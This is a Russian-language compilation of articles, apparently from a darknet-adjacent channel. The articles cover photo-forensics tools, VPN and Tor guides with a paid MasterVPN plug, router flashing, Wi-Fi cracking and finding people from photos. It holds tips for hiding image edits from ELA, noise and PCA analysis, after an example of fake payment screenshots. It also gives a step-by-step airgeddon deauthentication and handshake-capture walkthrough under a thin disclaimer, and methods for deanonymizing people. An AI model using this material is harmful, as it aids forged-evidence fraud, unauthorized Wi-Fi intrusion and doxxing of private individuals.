https://i.gyazo.com/dc983ce59d3e6e0091295dc48993b0fa.jpg


Если гугл поиск не дал результатов, есть еще один способ найти первоисточник фотографии:


В этом поможет сайт TinEye - поиск по изображениям и платформам, где эти фото хостятся. Найдет фотографии, даже если над ними была проделана определенная работа в фотошопе.

Добавьте фотографию и нажмите на "Oldest", так вы увидите первоисточник.
Если отрисовщик оказался не из новичков, то потребуются более серьезные меры. Все нижеописанные методы базируются на программеForensically.

Error Level Analysis или ELA

При сохранении фотография каждый раз сжимается, меняется количество пикселей, конвертируются цвета - так устроен формат JPEG. И даже если вы загружаете фотографии в высоком разрешении, разница в качестве все равно будет присутствовать.

При обычном осмотре фото, недочеты не так уж просто заметить, скорее даже невозможно. Тут на помощь приходит ELA - анализ фотографии на наличие наложений, различий в качестве и несоответствий в цветовой гамме. После редактирования уровень детализации значительно теряется, и любая область, темнее или светлее других, говорит о том, что фотошоп присутствовал. Работает ELA просто: обработанная область должна иметь различие в цвете.

Возьмем для примера фото из интернета. Мошенники часто делают фейковые скрины переводов, и сейчас мы будем разоблачать один из таких.

https://i.gyazo.com/d4c4b05f0209ec930860d08c68dd6640.jpg

На первый взгляд ничего необычного. Теперь загрузим фото в Forensically и выберем "Error Level Analysis".

https://i.gyazo.com/e551d16bc85ccbae64e5a6e409f370d8.jpg


Обратите внимание на появившиеся вклейки, которые отображаются другим цветом. Можно с 99 % уверенностью сказать, что фотография подвергалась монтажу.

ELA не всегда работает верно. Если мы возьмем любую фотографию с контрастным фоном, то анализ покажет тот же самый результат.

https://i.gyazo.com/4a78f6b628fd14d171b4086a55e80273.jpg

Именно поэтому нельзя полностью доверять этому методу. Для работы с ELA выбирайте фото с однотонными областями и без резких переходов. И всегда перепроверяйте с помощью других методов.

Noise Level Analysis

Исходное изображение и наложенная картинка или текст имеют различия в шумах. Так, Noise Level Analysis ищет шум и деформацию, появившиеся после редактирования.

Снова проверим на нашей картинке:

https://i.gyazo.com/dbbcaa84f8475972023df3f17750a879.jpg

Что наблюдаем? А видим мы увеличение шума в той же области, чего быть не должно.

Luminance Gradient Analysis

Покажет наличие фотошопа, ретуши, хромакея.

Работает данный способ со светом, который присутствует на любой фотографии. Как в жизни, так и на фото на объект всегда направлен источник света: чем ближе он к источнику, тем освещенность выше, дальше - ниже.

Рассмотрим на примере двух фотографий: НЛО и самолет в небе.

https://i.gyazo.com/2ca047d6d09abb1244b84c2cc64ce697.jpg

После анализа фотографии на градиент освещенности, было замечено, что свет падает неестественно, переход между тенями и светлыми участками слишком резкий. Чтобы окончательно убедиться в нереальности НЛО ( ̶я̶ ̶х̶о̶ч̶у̶ ̶в̶е̶р̶и̶т̶ь̶), мы добавим фотографию на проверку шумов. Вся тарелка светится как солнце в ясный день, что окончательно подтверждает нашу теорию.

Для сравнения возьмем другое фото:

https://i.gyazo.com/a329ab3b10efc78b6d84df7872fa17e2.jpg

Сравните как равномерно падает свет на самолет, никаких резких переходов - вверху область с наибольшей освещенностью, внизу с наименьшей - это говорит о рассеянном свете.

Данный метод определения монтажа один из самых выигрышных, он работает практически на любой фотографии, и любителям фотошопа не всегда удается его обхитрить.

Principal Component Analysis или PCA

Простым языком суть этого метода заключается в том, что если объекты находятся не на своих местах, то они будут отображаться на PCA в виде ярких пикселей, несоответствий цветов. Это будет значить, что на фото присутствует локальный монтаж (Healing Brush) или вклейка (Clone Stamp), или все вместе как на нашем примере:

https://i.gyazo.com/97fa6c9cb097b0a577e8867a9535b708.jpg

На фоне тарелки и на самом небе есть очень заметные пиксели. Скорее всего помимо полной вклейки проводилась и другая работа над картинкой, возможно, точечно удалялись птицы. Стоит отметить, что подобные крупные пиксели не всегда бывают на фото, чаще всего требуется увеличивать зум в различных областях и долго всматриваться, чтобы найти "обман".

Как обхитрить

Error Level Analysis


Не хочешь, чтобы переходы и различия в цвете выдали твой потрясающий монтаж? Пересохрани фотографию 10 раз, и ELA не покажет ничего примечательного.

Если не охота заморачиваться с сохранением, то можно изменить размер на любой коэффициент не кратный 2. Например, уменьшаем фото на 7% - ELA становится бесполезным.

Используйте формат PNG на двух фотографиях, ELA работает только c JPEG.


Noise Level Analysis


Как скрыть появившийся шум на фото? Добавить своего шума, так чтобы нельзя было понять, где какой шум начинается.

Если для обмана ELA мы меняли размер, то здесь нужно изменить качество раза так в 2.


Principal Component Analysis


Замыльте место редактирования, так цвета и переходы станут более плавными и анализ фото по PCA не даст результатов.

В случае как и с ELA, поможет изменение размера.


Итог:

Из-за растущей популярности ко всевозможным редакторам возникает некий ряд проблем, который может поставить под сомнение честность и добросовестность человека, использующего фотошоп. Дабы не дать себя обмануть, и самому не попасться на неумелом монтаже, мы разобрались как работают инструменты и как их можно обходить.

Image Forensics не совершенен. Он хорошо действует в том случае, когда человек не пытался утаить свою обработку. Если же монтажер знает о способах сокрытия своего обмана, то тут криминалистика изображений мало чем может помочь. Тем не менее, даже самый умелый пользователь фотошопа может совершить ошибку, что уж тут сказать про обычного человека.

https://telegra.ph/Ne-ver-svoim-glaz...-na-foto-01-28

https://i.gyazo.com/250a7db297700a346d0b7b5122f7f015.jpg

VPN от А до Я

Вступить в наш чат

VPN становится все более обязательным инструментом в наше время, ведь мы рискуем рассекретить себя каждый день. VPN - это уже не прихоть, а необходимость для каждого человека, который беспокоится о своей безопасности. Именно с VPN и начинается любая базовая защита в интернете. Если вы не хотите утечки своих личных данных, то самое время приоткрыть завесу и узнать, что же такое VPN, как он работает, какие виды VPN существуют, от чего защищает и самое важное - какой VPN лучше всего выбрать. Итак, мы начинаем.

https://i.gyazo.com/1e7dc74422b356979011ad932bb572da.gif

Что такое VPN

Аббревиатура VPN - Virtual Private Network, что в переводе значит виртуальная частная сеть. Это сервис, позволяющий защитить данные в сети путем их шифрования. Никто, в том числе и интернет-провайдер, не сможет прочесть и отследить запрашиваемую вами информацию в сети, потому что она исходит в виде зашифрованного трафика. VPN меняет ваш IP на свой адрес, поэтому вы обеспечиваете себе безопасное пользование сетью.

Как работает VPN

Соединение VPN можно охарактеризовать как канал между между вашим компьютером и компьютером-сервером, где узлы шифруют информацию до ее попадания в канал.

Вся работа VPN наглядно показана на следующей картинке:

https://i.gyazo.com/b2382deca87460ef24dac059baae0a0f.jpg


Ваш компьютер подключается к VPN и начинается процесс аутентификации;

Исходящий VPN пересылает информацию к сайту или серверу к которому вы обращались, то есть авторизует вас;

В результате установленного соединения весь трафик проходит путь в зашифрованном виде, следовательно, вы остаетесь в тени.


Для чего нужен VPN


В первую очередь VPN нужен для безопасного соединения, защиты трафика и сохранения анонимности;

VPN защищает от слежек, хакерских атак и перехвата данных;

VPN скрывает ваш реальный IP-адрес;

Дает доступ к заблокированным сайтам, форумам без ограничений;

Защищает от перехвата трафика в WI-FI сети.


Double VPN, Triple VPN, Quad VPN

С появлением обычных VPN, появились и сервисы, предоставляющие двойной, тройной VPN. Это связка нескольких VPN серверов, где вначале создается подключение между компьютером пользователя и первым VPN сервером. Затем создается второй шифрованный канал между первым и вторым VPN сервером, так трафик шифруется, и ваш IP адрес меняется несколько раз (дважды, трижды и т.д.).

https://i.gyazo.com/1de3897fb4c0fac99e7584cc05c961b0.jpg

Плюсы:


Провайдер видит первое подключение к VPN, но так как вы заходите в сеть еще и через второй сервер VPN, то он не знает ваш конечный IP адрес.

При каждом переподключении меняется ваш IP адрес: второй VPN сервер не знает ваш настоящий IP, потому что он скрыт первым VPN.
Минусы:


На каждом VPN сервере происходит расшифровка трафика.

Значительное снижение скорости (особенно при использовании Triple VPN и Quad VPN) из-за шифрования трафика, удаленности между несколькими серверами.
Итог:

Если вы не занимаетесь черными делишками и просто хотите скрыть настоящий IP, то вам идеально подойдет обычный VPN. Если вы думаете, что кому-то станет интересна ваша деятельность, то стоит сказать в пользу Double VPN, потому что двойное подключение действительно повышает вашу анонимность.

Нет необходимости использовать Triple VPN, Quad VPN, так как скорость подключения очень сильно пострадает, а дополнительный уровень защиты не прибавится.

Ну и, конечно же, не забывайте о комплексном подходе к защите и используйте и другие способы для вашей анонимности.



Но, чтобы не вводить себя в заблуждение, что VPN - универсальный способ безопасности, мы посмотрим, когда и в каких случаях VPN бесполезен:

https://i.gyazo.com/94f4ad317c677601e442c2a33a5836fd.gif


Спам. Вы получили фишинговое письмо в мессенджер, перешли по ссылке и тут же хакеры получили все, что хотели. Вывод: никогда не переходите по непонятным ссылкам от сомнительных отправителей, VPN в этом случае вам не поможет. Проверить ссылку на наличие спама, вирусов и фишинга можно тут или здесь.

Чужой ПК. Вам пришлось поработать на компьютере, которым вы ранее не пользовались. Но он оказался зараженным, и все ваши данные утекли с концами. Вывод: VPN не поможет от троянов, никогда не пренебрегайте антивирусом и пользуйтесь только проверенными ПК.

Сайты, которые вас палят. Вы сидите через нидерландский VPN и наблюдаете всплывающую рекламу на русском языке. Спросите: "как такое возможно?". Существует N-количество сайтов, которые следят за вами и пытаются узнать ваш настоящий IP-адрес. Если VPN не защищает от такого обнаружения, то сайтам это удастся. Помимо этого, сайты с легкостью могут деанонимизировать вас по следующим параметрам: язык операционной системы, версия браузера, сохраненные данные и др. Вывод: проверяйте безопасность подключения и наличие возможных утечек IP здесь, если утечка была, то действуйте следующим способом.

Подставной VPN провайдер. Вы бесплатно скачали VPN на первом сайте адресной строки. Но сами не подозревая, только усугубили ситуацию. Многие VPN провайдеры, видя весь ваш трафик через VPN сервис, промышляют злодеяниями. А именно: перенаправляют вас на вредоносные сайты, где вы заражаете свой компьютер. Вывод: Забудьте про существование бесплатных VPN, покупайте только у проверенных VPN провайдеров, безопасность превыше всего!



К слову про того, как выбрать VPN, мы составили ТОП-5 надежных сервисов. Как уже было сказано ранее, не стоит доверять бесплатным VPN и экономить на своей безопасности.


Поехали!
Лучшие VPN:

NordVPN

Занимает первые позиции во многих обзорах и рейтингах VPN;

Самые мощные шифровальные алгоритмы, Double VPN, VPN+TOR и другие технологии для полной конфиденциальности;

Наличие функции kill switch, которая завершает подключение к интернету, когда связь с сервером VPN становится нестабильной;

Компания находится в Панаме, поэтому имеет независимый статус, т. е. деятельность пользователей никак не фиксируется и никому не передается;

Отказ от ведения логов;

Имеет программы-клиенты для ПК (Windows, MacOS) и для телефонов (Android, IOS).
Сервис, безусловно, платный. Стоимость подписки:

https://i.gyazo.com/2bb11d3fb9ef078a105d4e8ee202e450.jpg

Surfshark

Главное отличие от NordVPN - это безлимитное количество устройств, в то время как в NordVPN разрешается не более 6;

Компания гарантирует защиту трафика путем шифрования военного уровня и технологий собственной разработки. Ваши действия не отслеживаются и не хранятся, логи не ведутся;

Наличие частного DNS на каждом сервере и защита от утечек при использовании стека IPv4;

Автоматически выбирает самый быстрый сервер для подключения, но так же можно указать страну вручную.;

Подстраховка в виде Kill Switch на случай, если VPN подключение прервется.
Стоимость подписки примерно такая же, как и у NordVPN:

https://i.gyazo.com/65eab5ae401eccde75737cbd4e11e025.jpg

CyberGhost

Универсальный VPN из Румынии с надежной политикой ведения логов: не записывает информацию о посещении сайтов и скрывает IP адрес;

Бесплатный период - 7 дней;

Разрешает до 7 одновременных подключений с одного аккаунта;

Поддержка 24/7, которая готова ответить на вопросы по работе провайдера;

При построении защищённой системы использует разные протоколы: OpenVPN, L2TP\IPsec, и IKEv2;

Большое количество платформ, в том числе ОС телевизоров и роутеров;

Поддержка P2P на отдельных серверах.


https://i.gyazo.com/d4bb1ffe4381709418dc5065d7c785b7.jpg

PureVPN

Штаб-квартира в Гонконге;

Безопасность военного уровня гарантирует пользователю высокую конфиденциальность;

Совместимость практически со всеми существующими платформами и ОС;

Техподдержка 24 часа в сутки, 7 дней в неделю, 365 дней в году;

Наличие Kill Switch - безопасное отключение от сети;

До 5 устройств одновременно.
Стоимость:

https://i.gyazo.com/b9c320448f18b7e191161781bc38ee33.jpg

Мастер VPN

Высокая степень безопасности и защищенности;

При построении защищённой системы использует разные протоколы: OpenVPN сервер, DoubleVPN или IKEv2;

Индивидуальный заказ. Создается любая конфигурация в зависимости от ваших задач;

Имеет программы-клиенты для ПК, для телефонов и планшетов;

Единоразовая плата - 1500-2000 р.

Мы разобрали различные популярные VPN-сервисы и рассмотрели их плюсы.
Если вы дорожите своей безопасностью, вам важно удобство и индивидуальный подход за небольшую плату- то однозначно обратите внимание на MasterVPN.

Вывод:

Относитесь серьезно к вашей безопасности и пользуйтесь только надежными VPN сервисами. К сожалению, многие платные и бесплатные VPN сервисы лишь создают иллюзию защиты, а на самом деле ведут логи, собирая о вас информацию. К тому же, несмотря на то что VPN использует надежные алгоритмы шифрования, он не гарантирует 100% сохранения анонимности, поэтому помимо VPN существуют и другие способы защиты - Proxy, Tor, которые следует использовать в связке. Надеюсь, что вы почерпнули что-нибудь новое из данной статьи. В следующий раз мы научимся самостоятельно настраивать собственный VPN сервер и VPN на роутере.
"Если не уверен в безопасности, считай, что опасность реально существует."

https://telegra.ph/VPN-ot-A-do-YA-02-01

https://i.gyazo.com/c2edb913a0f0d7b16e37de65746e8cf3.jpg

Tor browser - что это за "овощ" такой и с чем его едят?

Вступить в наш чат

На просторах даркнета не стоит забывать о безопасности. Вы можете стать отшельником, уехать в глушь, прихватив с собой ноутбук, захламить рабочий стол VPN сервисами, но при этом все равно вас легко смогут вычислить.



Данная статья будет полезна всем, кто только начинает открывать для себя теневой интернет мир и для тех, кто хочет оградить себя от неприятных последствий.


Одним из обходных путей, способным запутать цепочку являетсябраузер Tor. Мы разберем с вами основные FAQ, а также выясним как его установить на ПК и Android. А приятным бонусом ко всему будут полезные фишки, которые облегчат и ускорят работу с данным браузером. Так что читай до конца.

Что такое TOR?

TOR - это аббревиатура от слов The Onion Router, что в переводе означает "Луковый маршрутизатор". Само название говорит о принципе его работы. Tor трижды кодирует ваш трафик, тем самым создавая три слоя луковицы. Его задача - это соединить ваш компьютер с другими тремя компьютерами, чтобы не было понятно откуда изначально пришел трафик и куда он направляется.

https://i.gyazo.com/f25c16bf318ebfbdee928260e90f88cd.jpg

Для чего нужен TOR?

Основная задача, с которой прекрасно справляется данный браузер - сохранение анонимности. Под «анонимностью» обычно понимают, что пользователю удается скрыть от третьих лиц:


свою геопозицию и даже страну, с территории которой он выходит в сеть;

сайты, к которым он обращается;

временные периоды, в течение которых устанавливаются соединения;

сведения об аппаратном и программном обеспечении, которое он использует.
Также Tor нужен для того, чтобы попасть в Tor Network и обойти блокировки Роскомнадзора.

Что такое Tor Network?

Это теневой интернет, который целиком состоит из компьютеров с установленными на них TOR-ами. То есть каждый сервер в Tor Network обязательно имеет TOR - луковый маршрутизатор. С помощью Tor Network можно попасть на сайты .onion.

Нужно ли использовать Tor вместе с VPN?

Да, подключение этого типа помешает узлам Tor узнать ваш исходный IP-адрес, что послужит дополнительным уровнем защиты. VPN скрывает от провайдера сам факт использования Tor, он увидит лишь зашифрованный трафик, отправленный вашему VPN-серверу. Вы можете сначала подключиться к VPN, а потом к Tor (получится VPN -> Tor).

Что такое мосты?

Это входные ноды (узлы) Tor, которые передают данные с дополнительной защитой. Мосты придумали для того, чтобы трафик Tor невозможно было заблокировать, поскольку они шифруют его на отрезке - абонент -> входная нода. В конце статьи я поделюсь с вами лайфхаком как их создать.

Устанавливаем TOR на компьютер

Переходим на официальный сайт https://www.torproject.org/

https://i.gyazo.com/a2797b126aee2f4dcf3fa14452e0235a.jpg

Нажимаем "Download Tor Browser".

https://i.gyazo.com/10d46ae50c4d2cefd5dfdaa9a7b37da2.jpg

После выбираете вашу операционную систему и ждете окончания загрузки.

https://i.gyazo.com/53449151bce0b77d9fd1c1b1aca0df3c.jpg

После окончания установки открывается окно, где нужно нажать "Connect".

https://i.gyazo.com/e19579f67458aceb85cb1520fb2178b0.jpg

Через несколько секунд у нас открывается браузер, теперь мы можем открывать ссылки ".onion".

Устанавливаем TOR на телефон

Заходим в Play Market здесь нам понадобится установить 2 приложения - TOR Browser и Orbot. В App Store нет официального приложения TOR Browser и Orbot, поэтому придется поискать аналоги.

https://i.gyazo.com/41d87c1c1cd317fd798dd57c9858e7b3.jpg

https://i.gyazo.com/91b6bd855ad9448118164c4256f531df.jpg

Как только всё установили, запускаем Orbot и включаем режим VPN.

https://i.gyazo.com/46458685c67d538bad518f66e3a0b910.jpg

Готово! Можете открывать браузер и пользоваться.

Минусы Tor:


провайдер может увидеть, что вы пользуетесь Tor, но ему известен только сам факт его использования, трафик шифруется внутри Tor и остается в его пределах;

Tor замедляет скорость вашего интернета, поскольку трафик проходит через большое количество ретрансляторов;

Tor не может защитить вас полностью, если вы пренебрегаете осторожностью (платите со своей карты, скачиваете торренты, заходите в соцсети);

Многие веб-сервисы ограничивают доступ к Tor. При посещении таких сайтов вы можете столкнуться с ошибкой, например, 404.
Несмотря на небольшое количество недостатков, Tor вполне справляется с обеспечением вашей анонимности и безопасности на просторах интернета.

Полезные фишки при работе с Tor:

Отключаем анимацию банеров

Банеры расположены на всех теневых площадках, иногда в огромном количестве, что не может не надоесть. Отключение займет не больше 1 минуты.



https://i.gyazo.com/35289ef8b00edd48b63e767caa18291a.jpg

https://i.gyazo.com/59223c55c41631db751628972bcc54df.jpg


Подтверждаем наше действие.

https://i.gyazo.com/7ebc7a528e02529602421db1c7d26290.jpg

Вводим в поиск image.animationи кликаем на значок редактирования.

https://i.gyazo.com/6f4f4f7c835e71b0bfed83db258cb53c.jpg

Изменяем параметр normal на none.

Готово! Осталось перезапустить браузер и наслаждаться отсутствием рекламы.

Ищем сайты .onion

Если вы все сделали правильно и установили Tor, то у вас все равно может возникнуть вопрос: "Так как же попасть в даркнет?" В этом нам помогут сайты .onion. Многие люди, не понимая как их найти, продолжают искать информацию через duckduckgo - встроенный поисковик в браузере.

А ведь по сравнению с обычными версиями сайтов .onion обеспечивают дополнительную анонимность и безопасность, так как подобные адреса не являются полноценными записями DNS, и информация о них не хранится в корневых серверах DNS.

OnionLand Search - актуальная ссылка

https://i.gyazo.com/91b6745881edc7a89b8c9a2c889e951a.jpg

Кто ищет, тот всегда найдет












https://darkmoney.one/images/smilies/smile.gif

Настройка мостов

https://i.gyazo.com/66d86aab23ba73c7308c1bd36bbead88.jpg

Запускаем Браузер, затем открываем параметры.

https://i.gyazo.com/e651bd1f999d2a64045df0c34408590d.jpg


Слева выбираем Tor и устанавливаем все параметры как на скриншоте.

https://i.gyazo.com/9758ba299e226ec6f225ab49c7c2dbec.jpg


Перезапускаем браузер, открываем любой сайт. А теперь проверяем, нажав на значок "замок" слева в адресной строке.

Таким образом мы научились настраивать мост.

Надеюсь, что данная статья была полезной. Успехов!

https://telegra.ph/Tor-browser---cht...go-edyat-03-04

https://i.gyazo.com/6f50461855feb324974a32533ca20142.jpg

VPN на роутере: что это такое и как настроить

Вступить в наш чат



VPN-сервисы используются повсеместно, поскольку они являются гарантом безопасности в интернете: защита от хакерских атак и перехвата данных, возможность скрыть ваш настоящий IP-адрес, доступ к заблокированному контенту и многие другие вещи, которые подвластны виртуальным частным сетям.

Из прошлой статьи мы выяснили, что не все сервисы предоставляют VPN, который поддерживает неограниченное количество устройств. Если так случилось, что вам нужно одновременно установить VPN на 10 устройств, и вы не хотите устанавливать и настраивать его на каждом из них, то самое время поговорить про VPN подключение на роутере. Мы разберемся, как легко и просто это сделать всего за 15 минут.

https://i.gyazo.com/5eb6631e2ffdf6ced690508b0fa37f2b.jpg

Чтобы пользоваться VPN на роутере вам понадобится:

выбрать надежный VPN-сервис;

определиться с роутером;

настроить VPN.
VPN-сервис

К сожалению, нельзя доверять каждому сервису, который предоставляет VPN. Не советуем рисковать и выбирать первый попавшийся, лучше ознакомьтесь с нашим ТОП-5 VPN, о которых мы писали в предыдущей статье, так вы убережете себя от возможных ошибок.

Преднастроенный VPN-роутер

Преднастроенный роутер - самый дорогой из VPN-роутеров. За эти деньги вы получаете уже готовое к работе устройство, не требующее перепрошивки или настройки. При выборе роутера следует обратить внимание на следующие пункты:

Решите какой VPN-протокол вам требуется. Например, если вы остановите свой выбор на Open VPN, то лучше всего будет приобрести роутер с одноядерным процессором. Open VPN отличается высоким уровнем шифрования, поэтому скорость подключения может значительно снижаться.

Вдобавок к этому, если скорость для вас является решающим фактором, то покупайте роутер с процессором не менее 800 МГц.


Как прошить роутер самостоятельно

VPN-роутер - недешевое удовольствие, поэтому неудивительно, что вам не захочется покупать его.Но же тогда делать? Можно ли использовать старый роутер?

И ответ положительный. Нет нужды покупать еще один роутер, если мы можем перепрошить старый, используя специальное ПО. Переходим на официальные сайты прошивок и ищем наше устройство DD-WRT и Tomato. Посмотрите, поддерживает ли ваш роутер прошивку, они доступны для большинства моделей роутеров.

DD-WRT - универсальный вариант, поддерживается множеством производителей, даже самыми малоизвестными: TP-Link, D-Link, Tenda.

Tomato - прошивка с меньшим количеством поддерживаемых устройств, но имеющая более простой интерфейс. Также является более подходящим вариантом для протокола OpenVPN.

Настройка VPN-роутера

Если роутер поддерживается одну из двух прошивок, то действуем следующим образом:

Загружаем прошивку с официального сайта;

Делаем сброс настроек. Для этого нажмите и удерживайте кнопку RESET на задней части устройства в течение 30 секунд, затем отключите роутер от питания и держите RESET еще в течение 30 секунд, включите роутер и снова зажмите эту же кнопку на 30 секунд.

Чтобы настроить VPN-соединение, заходим в панель управления роутера через браузер. Адрес, по которому можно попасть на эту страницу, указывается в руководстве каждого роутера. Там же будут написаны и заводские данные для входа. Например, вводим в адресной строке браузера 192.168.0.1 или 192.168.1.1. Логин и пароль по умолчанию - admin.

В панели управления (слева) выберите опцию обновления UPGRADE или UPLOAD FIRMWARE.

Как только новая вкладка открылась, загрузите файл установки, а именно ранее скачанную прошивку Tomato или DD-WRT.

Во время установки не делайте никаких действий, дождитесь несколько минут, когда файл загрузится и выберите Продолжить.

Напоследок сделайте еще один полный сброс настроек и войдите в панель управления роутера. Если все сделали верно, то вы увидите новую функцию VPN.
Данная инструкция по перепрошивке подходит практически для каждой модели роутера.

К сожалению, если роутер не поддерживает такую возможность, то вам все же потребуется купить новое устройство.

Плюсы:


Неограниченное количество устройств. VPN будет защищать все новые устройства, которые вы подключаете, и вы сможете делиться защищенным подключением с членами семьи и друзьями, когда они подключатся к вашему Wi-Fi;

Совместимость с большим количеством платформ. У вас есть приставка Apple TV, но вы не можете установить на нее VPN? Однако вы хотите смотреть контент, доступ к которому ограничили в вашей стране. Воспользуйтесь VPN-роутером;

Вам нужно ввести логин и пароль только единожды. После того, как вы настроите VPN-роутер в первый раз, вам больше не нужно будет переживать по этому поводу, пользуйтесь сколько захотите.
Минусы:


Цена. Да, как мы уже выясняли покупать новый роутер с преднастроенной прошивкой не очень дешево. Хотя прошить роутер, как оказалось, не так уж и сложно, что можно определенно отнести к преимуществам;

Больше устройств - ниже скорость. Имейте в виду, что с каждым новым подключенным устройством, значительно падает производительность.


Вывод

Рассмотрев все явные преимущества и недостатки VPN-роутеров, можно отметить, что первых все-таки больше. При выборе стоит взвесить все ваши нужды и потребности: что вы ждете от VPN, сколько платформ вы используете, какой у вас бюжет. Если у вас всего 1 устройство и вам не нужно больше, то смысла в VPN-роутере нет. Но если же вам хочется пользоваться интернетом на многих устройствах и при этом быть уверенным в своей конфиденциальности и безопасности, то не пожалейте 15 минут и настройте VPN-роутер.

https://telegra.ph/vpn-02-04

https://i.gyazo.com/22fe8f6dc242d8439a9424d60a6ed701.jpg

Учимся взламывать Wi-Fi всего за несколько шагов

Вступить в наш чат

Существует куча способов как взломать Wi-Fi. И это еще больше убеждает нас лишний раз подумать о дополнительной защите, а именно о необходимости использовать VPN. Подробнее об этом читайте здесь. В данной же статье мы рассмотрим самые распространенные методы взлома и на примере Kali Linux научимся перехвачивать handshake.

Текст статьи не является призывом к действию и публикуется для ознакомления со способами взлома и построения грамотной защиты.

Виды взлома:


Перехват handshake - отключаем всех от сети, ловим пакет с авторизацией любого клиента и расшифровываем его;

Brute-force паролей - перебор всех комбинаций возможных паролей по словарю;

Фишинг - отправка фишинговой (левой) страницы пользователю Wi-Fi, с запросом на ввод пароля для входа(например, под предлогом обновления). Такой взлом можно делать самостоятельно или с помощью специального приложения Wifiphisher;

WPS - подбор вероятных паролей или взлом стандартных заводских PIN-кодов. Роутеров с включённым WPS становится всё меньше, но этот способ еще имеет место быть.



Существуют и другие подходы к получению доступа, но мы не будем на них зацикливаться и перейдем к практической части - взлом с использованием Kali handshake.


Kali Linux

Kali является лучшим бесплатным дистрибутивом для осуществления хакерских атак. Kali включает в себя более 300 утилит для удобства в работе, поддерживает практически все файловые системы, интерфейсы и типы накопителей. Если вы пользователь Windows, но хотите испытать Kali в деле, то перед началом установите дистрибутив на VirtualBox.

1. Установка Kali в VirtualBox

Устанавливаем последнюю версию VirtualBox и скачиваем Kali Linux VirtualBox.

Выбираем 64-Bit или 32-Bit.

https://i.gyazo.com/cb2c4461cf66d4e69421bdb052948983.jpg

После того как VirtualBox установилось на ваш ПК, открываем и выбираем опцию Импортировать.

https://i.gyazo.com/f2d354aeb35804efa01181e8045aa59b.jpg

Выбираем Kali Linux, устанавливаем количество ядер и ОЗУ для виртуальной машины и жмем на Импорт.


https://i.gyazo.com/dbd3132744c61e120d6e2f141420ca3e.jpg


Запускаем Kali Linux и вводим логин kali и пароль kali.

https://i.gyazo.com/debd9f9e10e84bdc24f2682df9eb840f.jpg




Перед тем, как перейти к непосредственной установке, вам нужно открыть терминал на компьютере с Kali Linux. Найдите и щелкните по иконке приложения Терминал или просто нажмите Alt+Ctrl+T.


2. Установка airgeddon

Скачиваем утилиту airgeddon на нашу машину с Kali. Данной утилиты нет по умолчанию в Kali, но она нам нужна для перехвата handshake.

sudo git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git Переходим в папку с установленной airgeddon и запускаем ее командой:

cd airgeddon/ sudo ./airgeddon.sh

3. Установка bettercap

Вероятнее всего у вас тоже не будет хватать утилиты bettercap. Bettercap – программа для мониторинга и спуфинга (когда программа маскируется под другую с помощью подмены данных). Устанавливаем этот инструмент, вводим в терминале простую команду:

sudo apt install bettercap

4. Мониторинг сети

Если к компьютеру подключен USB Wi-Fi адаптер, включим его следующим образом: Устройства → USB → MediaTek 802.11 n WLAN. Название Wi-Fi адаптера может отличаться, поэтому чтобы его узнать вводим команды ifconfig или ip a.

Далее выберите свой Wi-Fi адаптер. В нашем случае адаптер называется wlan0.

Переходим в главное меню и переводим наш адаптер в режим мониторинга, это цифра 2.

https://i.gyazo.com/c544516419f4f2d54c61292839d524bd.jpg

5.Получение рукопожатий

Переходим в меню инструментов для работы c handshake, выбрав цифру 5. В этом меню нам нужно запустить поиск цели - цифра 4. Как только появится наша Wi-Fi точка, можно заканчивать поиск, для этого нажмем Ctrl+C. После чего выберите ее из списка.

Стоит отметить, что если на точке не будет пользователей, то сделать handshake не получится.

Цель выбрана, а значит цифрой 6 переходим в режим захват рукопожатия.

Мы наблюдаем 3 вида атаки:

1.Атака деаутентификации/разъединения amok mdk3

2.Атака деаутентификации aireplay

3.Атака смешения WIDS/WIPS/WDSУстройства

Нам же нужно выбрать вторую-Атака деаутентификации aireplay.

Этот способ лучше 1-го по той причине, что вам не придется ждать, когда пользователь введет пароль от точки.

Далее идет перехват, и вам предлагают прописать путь сохранения handshake в папке, что и нужно сделать.

На этом взлом handshake успешно закончен.

Итог

Итак, вы узнали какие способы взлома существуют, на примере научились делать мониторинг Wi-Fi сети и перехватывать рукопожатия. Вдобавок хочется поделиться несколькими советами для повышения вашей безопасности:


Используйте VPN. Это основное и самое главное правило, если вы не хотите стать мишенью для недоброжелателей;

Выключите режим WPS в роутере;

Придумайте сложный пароль и регулярно меняйте его;

Периодически обновляйте прошивку роутера.
Всем безопасного серфинга!

https://telegra.ph/Uchimsya-vzlamyva...o-shagov-02-07

https://i.gyazo.com/3465819ee8d9f339403b8b4a9aec4ddb.jpg

Как пробить человека по фотографии

Вступить в наш чат

Найти человека в интернете по фото - это давно уже миф, а реальность. Даже одна фотография может выдать кучу информации: начиная от метаданных и заканчивая координатами, которые можно определить по виднеющейся улице на заднем плане. В этой статье мы поговорим о том, как деанонимизировать человека с помощью простых, а главное бесплатных средств.

Но для начала разберемся как устроен поиск по фотографиям, чтобы лучше понять его суть.

https://i.gyazo.com/4c22a2002d26b43b4057540e2185b246.jpg

Метаданные, они же EXIF

Любая фотография формата JPEG содержит в себе метаданные. Они включают дату, название модели камеры или смартфона, а еще редактирование, если оно имело место быть. Но и самое интересное, что иногда метаданные могут показать геолокацию фотографии.

Именно с EXIF следует начинать поиск. Несмотря на то что любое устройство может отобразить эту информацию, возможности просмотра будут ограничены. Поэтому на помощь приходят специальные программы для расширенного просмотра.

ПриложениеExifTool является одной из таких, оно может прочесть огромный перечень данных с фото. И то не только EXIF, а еще и GPS, XMP, IPTC, JFIF, GeoTIFF, ICC Profile, Photoshop IRB и другие. Приложение бесплатное и поддерживает как Windows, так и MacOS.
https://i.gyazo.com/9078af31fd0bcc975a57b229e89351eb.png


Jeffrey's Image Metadata Viewer - сайт для определения EXIF, аналог ExifTool, разница лишь в том, что не требует установки на ПК.

Stolencamerafinder.com — определит метаданные и найдет какие еще фото были сделаны с помощью этого устройства.
Помимо этого, есть еще несколько сервисов для работы с этими данными:

Если на фотографии определилась геолокация, то сайт pic2map покажет на карте конкретное место, где было сделано фото.

С помощью сервиса https://29a.ch/photo-forensics можно определить, подверглась ли фотография монтажу.

SunCalc - уникальный сервис, который с высокой точностью может определить место, где была сделана фотография всего лишь по солнцу. Для этого нужно ввести точно время, когда была сделана фотография.
Основной проблемой метаданных является то, что они зачастую стираются любыми редакторами, не давая возможность разгласить информацию о человеке. А учитывая то, что редакторами пользуются практически все, то шанса их прочесть практически нет. Ко всему прочему EXIF очень просто стереть или изменить самостоятельно с помощью exifpurge.com, поэтому нельзя полностью полагаться на данный метод поиска.

